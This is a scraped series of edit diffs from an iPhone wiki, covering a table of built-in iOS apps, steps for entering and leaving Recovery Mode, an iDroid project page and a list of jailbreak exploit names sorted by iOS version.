| {{no}}<br />
| {{yes}}<br />
| iBooks app built into iOS 8.<br />
|-<br />
| {{ipfw|InCallService.app}}<br />
| {{ipfw|InCallService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| This can be accessed through Safari; just type diags:// into the URL bar.<br />
|-<br />
| {{ipfw|iPodOut.app}}<br />
| {{ipfw|iPodOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no (?)}}<br />
| Hidden app for iPodOut functionality with third party equipment such as car entertainment systems. Provides a media selection and notification view interface through the video output.<br />
|-<br />
| {{ipfw|iTunes.app}} (Not to be confused with MobileStore.app, the iTunes Store app)<br />
| {{ipfw|iTunes.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app. Crashes on startup. Purpose not known.<br />
|-<br />
| {{ipfw|kbd.app}}<br />
| {{ipfw|kbd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| <br />
|-<br />
| {{ipfw|MailCompositionService.app}}<br />
| {{ipfw|MailCompositionService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Maps~iphone.app}} (Maps.app on iOS 7)<br />
| {{ipfw|Maps~ipad.app}}<br />
| No Apple TV Version<br />
| Maps<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Maps.<br />
|-<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
|-<br />
| {{ipfw|MessagesViewService.app}}<br />
| {{ipfw|MessagesViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|MobileCal.app}}<br />
| {{ipfw|MobileCal.app}}<br />
| No Apple TV Version<br />
| Calendar<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calendar.<br />
|-<br />
| {{ipfw|MobileMail.app}}<br />
| {{ipfw|MobileMail.app}}<br />
| No Apple TV Version<br />
| Mail<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mail. Updated in iOS 4 and iOS 7.<br />
|-<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| No Apple TV Version<br />
| iPod; Music; Videos<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| iPod/Music/Videos. Uses the '''[[Application Roles]]''' feature to have more than one icon. Split into separate Music/Videos apps since iOS 5.<br />
|-<br />
| {{ipfw|MobileNotes.app}}<br />
| {{ipfw|MobileNotes.app}}<br />
| No Apple TV Version<br />
| Notes<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Notes.<br />
|-<br />
| {{ipfw|MobilePhone.app}}<br />
| {{ipfw|MobilePhone.app}} (iPad 2 and newer only, running iOS 6 and under)<br />
| No Apple TV Version<br />
| Phone; FaceTime for iOS 6 and under<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Only FaceTime is shown on the iPad and iPod touch. On iOS 7 FaceTime is an independent application. Uses the '''Application Roles''' feature to have more than one icon.<br />
|-<br />
| {{ipfw|MobileReplayer.app}}<br />
| {{ipfw|MobileReplayer.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| MobileReplayer's purpose isn't known. Crashes upon startup.<br />
|-<br />
| {{ipfw|MobileSafari.app}}<br />
| {{ipfw|MobileSafari.app}}<br />
| No Apple TV Version<br />
| Safari<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mobile Safari web browser.<br />
|-<br />
| {{ipfw|MobileSlideShow.app}}<br />
| {{ipfw|MobileSlideShow.app}}<br />
| No Apple TV Version<br />
| Photos (iOS 4 and above); Photos, Camera (older OS versions)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Photo Albums, Places, Faces*, Events* and Import°.<br />
<br />
<nowiki>* </nowiki>Mac only.<br />
<br />
° with iPad Camera Connection Kit<br />
|-<br />
| {{ipfw|MobileSMS.app}}<br />
| {{ipfw|MobileSMS.app}}<br />
| No Apple TV Version<br />
| [[Messages]]; Text (iPhone OS < 2.2.1)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| SMS, MMS and [[iMessage]]<br />
|-<br />
| {{ipfw|MobileStore.app}}<br />
| {{ipfw|MobileStore.app}}<br />
| No Apple TV Version<br />
| iTunes Store (iTunes prior to iOS 7)<br />
| {{partial|1.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| iTunes Store and Ping.<br />
|-<br />
| {{ipfw|MobileTimer.app}} (MobileTimer~iphone.app on iOS 6 only)<br />
| {{ipfw|MobileTimer~ipad.app}} (only from iOS 6)<br />
| No Apple TV Version<br />
| Clock<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| World Clocks, Alarms, Stopwatch and countdown Timer.<br />
|-<br />
| {{ipfw|Music~iphone.app}} (Music.app on iOS 7)<br />
| {{ipfw|Music~ipad.app}}<br />
| No Apple TV Version<br />
| Music<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app. Icon is identical to the one previously only displayed on iPod touches.<br />
|-<br />
| {{ipfw|Nike.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Nike+iPod<br />
| {{no}}<br />
| {{partial|2.2.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Nike+iPod. Only on applicable devices (iPod touch 2G, iPhone 3G, and newer) when enabled in Settings.<br />
|-<br />
| {{ipfw|Podcasts.app}}<br />
| {{ipfw|Podcasts.app}}<br />
| No Apple TV Version<br />
| Podcasts<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Podcasts app built into iOS 8.<br />
|-<br />
| {{ipfw|PreBoard.app}}<br />
| {{ipfw|PreBoard.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown, crashes at start.<br />
|-<br />
| {{ipfw|Preferences.app}}<br />
| {{ipfw|Preferences.app}}<br />
| No Apple TV Version<br />
| Settings<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Settings.<br />
|-<br />
| {{ipfw|PrintStatus.app}}<br />
| {{ipfw|PrintStatus.app}}<br />
| No Apple TV Version<br />
| Print Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Print Center.<br />
|-<br />
| {{ipfw|quicklookd.app}}<br />
| {{ipfw|quicklookd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Reminders.app}}<br />
| {{ipfw|Reminders.app}}<br />
| No Apple TV Version<br />
| Reminders<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Reminders application.<br />
|-<br />
| {{ipfw|Setup.app}}<br />
| {{ipfw|Setup.app}}<br />
| No Apple TV Version<br />
| Setup<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden setup app. Opens automatically after a restore.<br />
|-<br />
| {{ipfw|Passbook.app}} (Shoebox.app prior to iOS 7)<br />
| No iPad Version<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Passbook.<br />
|-<br />
| {{ipfw|SiriViewService.app}}<br />
| {{ipfw|SiriViewService.app}}<br />
| No Apple TV Version<br />
| Siri<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[Siri]] controller.<br />
|-<br />
| {{ipfw|ShoeboxUIService.app}} (PassbookUIService.app on iOS 7)<br />
| {{ipfw|ShoeboxUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
|<br />
|-<br />
| {{ipfw|SocialUIService.app}}<br />
| {{ipfw|SocialUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Stocks.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Stocks<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Stocks. Updated in iPhone OS 3.0 and iOS 7.<br />
|-<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Account Migration (??) for Tencent Weibo Accounts<br />
|-<br />
| {{ipfw|TrustMe.app}}<br />
| {{ipfw|TrustMe.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Related to SSL and certificates.<br />
|-<br />
| {{ipfw|UserAuthentication.app}}<br />
| {{ipfw|UserAuthentication.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown app. Does nothing when launched. Might be used for the iOS 8 Touch ID API.<br />
|-<br />
| {{ipfw|Videos.app}}<br />
| {{ipfw|Videos.app}}<br />
| No Apple TV Version<br />
| Videos<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app.<br />
|-<br />
| {{ipfw|VoiceMemos.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Voice Memos<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Voice Memos. Requires <code>encode-aac</code> capability and a microphone.<br />
|-<br />
| {{ipfw|Weather.app}}<br />
| {{ipfw|Weather.app}}<br />
| No Apple TV Version<br />
| Weather<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Weather. Updated for fast app switching support and hourly forecast and in iOS 6.<br />
|-<br />
| {{ipfw|Web.app}}<br />
| {{ipfw|Web.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Runs fullscreen web clips.<br />
|-<br />
| {{ipfw|WebApp1.app}}<br />
| {{ipfw|WebApp1.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown purpose, crashes on startup<br />
|-<br />
| {{ipfw|WebContentAnalysisUI.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|WebSheet.app}}<br />
| {{ipfw|WebSheet.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Used for overlaying web data. Usually for logging in to Wi-Fi Hotspots which use forced webpages to request user data.<br />
|-<br />
| {{ipfw|WebViewService.app}} (WebUIService prior to iOS 7)<br />
| {{ipfw|WebViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|WhatsNew.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|YouTube.app}}<br />
| {{ipfw|YouTube.app}}<br />
| No Apple TV Version<br />
| YouTube<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| Watch [http://youtube.com YouTube] videos; removed in iOS 6 beta 4 according with the Google License.<br />
|}<br />
<br />
==== Unofficial Apps ====<br />
These application bundles are not present on an unmodified system and are generally installed via a PC utility, manually or through a package. More applications may be installed after jailbreak.<br />
* [[Installer.app]] (AppTapp Installer)<br />
* [[blackra1n.app]] ([[blackra1n]] and [[limera1n]])<br />
* [[Cydia.app]] (Cydia Installer)<br />
<br />
=== Files ===<br />
(none)<br />
<br />
== Parents ==<br />
{{parent}}<br />
<br />
[[Category:Filesystem]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications/Preferences.app&diff=41315
/Applications/Preferences.app
2014-06-17T00:33:40Z
<p>Ryandolan123: </p>
<hr />
<div>This is the Settings app which comes with stock [[iOS]]. <br />
<br />
[[Category:Filesystem]]<br />
{{Stub|software}}<br />
[[Category:Application]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Recovery_Mode&diff=41313
Recovery Mode
2014-06-16T23:47:34Z
<p>Ryandolan123: Added a new picture of iPhone in recovery mode</p>
<hr />
<div>[[Image:RecoveryMode.jpeg|thumb|right|An iPhone 5S in Recovery Mode.]]<br />
Recovery Mode is a failsafe in [[iBoot (Bootloader)|iBoot]] that is used to reflash the device with a new OS, whether the currently installed one is somehow damaged or the device is undergoing an upgrade via [[iTunes]].<br />
<br />
Information about [[Recovery Mode (Protocols)|Recovery Mode's protocols]] is available.<br />
<br />
== Entering Recovery Mode ==<br />
=== Automatic Method ===<br />
Call the AMDeviceEnterRecovery function in [[MobileDevice Library|MobileDevice Framework]]<br />
=== Manual Method ===<br />
# Connect the device to the Computer<br />
# Make sure iPhone is in the homescreen<br />
# Hold The Home Button and The Power Button till Connect To iTunes logo is seen<br />
# Ignore the Slide To Power Off message<br />
<br />
or<br />
# Turn off the device.<br />
# Press and hold the home button<br />
# Connect the device with iTunes<br />
# Wait until you see the iTunes logo on the iPhone<br />
<br />
== Exiting Recovery Mode ==<br />
=== Automatic Method ===<br />
Call the AMRecoveryDeviceSetAutoBoot & AMRecoveryDeviceReboot functions in the [[MobileDevice Library|MobileDevice Framework]]<br />
or send the following commands to the [[iPhone]] using a terminal<br />
<br />
<pre>> setenv auto-boot true<br />
> saveenv<br />
> reboot</pre><br />
<br />
=== Manual Method ===<br />
Hold the Home button + Power Button till the Apple Logo Appears<br />
<br />
== Recovery Mode output to the computer ==<br />
iProduct: "Apple Mobile Device (Recovery Mode)"<br />
iSerialNumber: "CPID:XXXX CPRV:15 CPFM:03 SCEP:03 BDID:00 ECID:XXXXXXXXXXXXXXXX IBFL:01 SRNM:[XXXXXXXXXXX] IMEI:[XXXXXXXXXXXXXXX]"</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Talk:XPwn&diff=41213
Talk:XPwn
2014-05-29T05:06:42Z
<p>Ryandolan123: /* "For the specific program, see xpwn." Redirects to the same page you're on now */ new section</p>
<hr />
<div>Will xpwn work on the iOS-5 betas?<br />
:Yes, [[sn0wbreeze]] for iOS5 beta 1 uses [[Xpwn]]. --[[User:Cj|cj]] 11:35, 15 June 2011 (UTC)<br />
<br />
== "For the specific program, see xpwn." Redirects to the same page you're on now ==<br />
<br />
xpwn (lowercase) always redirects to this page. Is there no page for the xpwn command line command, or is the redirect just an improperly implemented redirect? Hopefully this makes sense, I'm writing this at 1 AM, and the things I write at 1 AM aren't always the best.</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=IDroid&diff=41154
IDroid
2014-05-17T21:31:09Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
[[File:Openiboot.png|thumb|right|200px|Device running the OpeniBoot console.]]<br />
'''iDroid''' is a project which goals are to port linux and Android to the [[iPhone]]/[[iPod touch]]/[[iPad]] and use different OSes as alternatives to standard [[iOS]].<br />
<br />
iDroid is not actually a hack/exploit neither an unlock, but it is based on [[Bootrom]] exploits which allowing the running of unsigned code at low level.<br />
<br />
=== OpeniBoot ===<br />
<br />
The goals of OpeniBoot are<br />
* to run low-level code, <br />
* to have low and critical drivers ([[NAND]] and [[NOR]] driver, [[NOR_(NVRAM)|NVRAM]]...), and<br />
* to have a debugger and development environment (chainloading, upgrading itself and USB mass storage).<br />
<br />
=== Linux ===<br />
A linux Bootloader, a working linux kernel (just a question of cross-compiler), porting drivers, run wifi and command line through SSH.<br />
<br />
=== Android ===<br />
On 21 April 2010, an Android distribution based on iPhoneLinux called iDroid was released.<br />
<br />
* Announcement on the linuxoniphone blog: [http://linuxoniphone.blogspot.com/2010/04/ive-been-working-on-this-quietly-in.html iDroid initial release]<br />
* Official iDroid Wiki: [http://www.idroidproject.org/ iDroid Project]<br />
<br />
== Frequently Asked Questions ==<br />
<br />
To see answers to frequently-asked questions about iPhoneLinux and iDroid, go to the [http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ] page.<br />
<br />
== See Also ==<br />
* [[Android]]<br />
<br />
[[Category:Android on iPhone]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=IDroid&diff=41153
IDroid
2014-05-17T21:26:01Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
[[File:Openiboot.png|thumb|right|200px|Device running the OpeniBoot console.]]<br />
'''iDroid''' is a project which goals are to port linux and Android to the [[iPhone]]/[[iPod touch]]/[[iPad]] and use different OSes as alternatives to the standard Apple "[[iOS]]".<br />
<br />
iDroid is not actually a hack/exploit neither an unlock, but it is based on [[Bootrom]] exploits which allowing the running of unsigned code at low level.<br />
<br />
=== OpeniBoot ===<br />
<br />
The goals of OpeniBoot are<br />
* to run low-level code, <br />
* to have low and critical drivers ([[NAND]] and [[NOR]] driver, [[NOR_(NVRAM)|NVRAM]]...), and<br />
* to have a debugger and development environment (chainloading, upgrading itself and USB mass storage).<br />
<br />
=== Linux ===<br />
A linux Bootloader, a working linux kernel (just a question of cross-compiler), porting drivers, run wifi and command line through SSH.<br />
<br />
=== Android ===<br />
On 21 April 2010, an Android distribution based on iPhoneLinux called iDroid was released.<br />
<br />
* Announcement on the linuxoniphone blog: [http://linuxoniphone.blogspot.com/2010/04/ive-been-working-on-this-quietly-in.html iDroid initial release]<br />
* Official iDroid Wiki: [http://www.idroidproject.org/ iDroid Project]<br />
<br />
== Frequently Asked Questions ==<br />
<br />
To see answers to frequently-asked questions about iPhoneLinux and iDroid, go to the [http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ] page.<br />
<br />
== See Also ==<br />
* [[Android]]<br />
<br />
[[Category:Android on iPhone]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=User_talk:Ryandolan123&diff=41061
User talk:Ryandolan123
2014-05-07T21:41:14Z
<p>Ryandolan123: /* Jailbreak Exploits edits */</p>
<hr />
<div>== [[Jailbreak Exploits]] edits ==<br />
<br />
Hi Ryan. I'm just curious, but where did you get the list of exploits for [[p0sixspwn]]? — '''[[User:Spydar007|<span style="color:#ff5a00;">Spydar007</span>]] [[User talk:Spydar007|<span style="color:orange;">(Talk)</span>]]''' 14:48, 6 May 2014 (UTC)<br />
<br />
The only one I knew off the top of my head was the MobileBackup2 exploit which was just patched in 7.1. The rest come from the [[p0sixspwn]] page :)<br />
--[[User:Ryandolan123|Ryandolan123]] ([[User talk:Ryandolan123|talk]]) 21:41, 7 May 2014 (UTC)</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41043
Jailbreak Exploits
2014-05-06T01:09:36Z
<p>Ryandolan123: /* 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 */</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
